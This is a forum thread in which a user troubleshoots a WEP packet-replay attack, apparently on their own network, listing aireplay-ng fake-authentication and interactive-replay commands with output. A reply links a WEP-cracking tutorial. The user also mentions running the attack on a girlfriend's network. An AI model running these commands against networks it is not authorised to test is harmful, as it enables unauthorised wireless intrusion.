Results 1 to 3 of 3

Thread: Problem with Aireplay-ng

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010

    Default Problem with Aireplay-ng

    Hey Dudes,
    I've got a problem and I hope that someone can help me.
    I want to test my network..
    Thus I want to do with the interactive packet replay attack.

    At first the basics:
    I am using BackTrack 4, with an Intel 3945 ABG chipset, yeah I do know its not the best one..
    I performed the injection test with a positive result.
    In the network there is no client.
    I already started capturing the ivs.
    I do want to cause some traffik with the aireplay-ng -2 -p 0841 attack.

    My problem:

    At first I make the fake authentication with this command:
    aireplay-ng -1 0 -a 00:23:08:81:2A:25 -h 00:1C:BF:69:AA:83 wlan0
    -a is the ap's mac and -h is my chipset's one

    It responds:

    18:06:11 Waiting for beacon frame (BSSID: 00:23:08:81:2A:25) on channel 5

    18:06:11 Sending Authentication Request (Open System) [ACK]
    18:06:11 Authentication successful
    18:06:11 Sending Association Request [ACK]
    18:06:11 Association successful :-) (AID: 1)
    So far, this seems to be sucessful, now I'm trying to do the replay with this command:
    aireplay-ng -2 -p 0841 -b 00:23:08:81:2A:25 -h 00:1C:BF:69:AA:83 -c FF:FF:FF:FF:FF:FF wlan0
    again, -b is the ap's mac and -h my chipset's one..

    Well, there isn't a real respond... it just count some packets:

    Read 9277 packets...
    Nothing more happens..

    Have you got a solution for me ?
    Thx for reading,


  2. #2
    Senior Member
    Join Date
    Aug 2007


    I believe that command with trying to use interactive mode to capture packets with a fake auth setup and no other clients connected except yourself won't be of much use.

    Have you actually tried other methods than simply using that very simple command shown in here?:
    how_to_crack_wep_with_no_clients [Aircrack-ng]

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010


    Yeah, I do know its not that effective, but it's the easiest one and from my point of you the most logical one
    I actually tried almost every replay attack but no attack, requiering a authentification, has worked.
    I also tried to use a different network, my girlfriend's one, but with the same result.
    At last I just tried to use a different device on a different pc, am i too stupid or what xD ?

    PS: I tried the tutorial, but again, nothing has happend.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts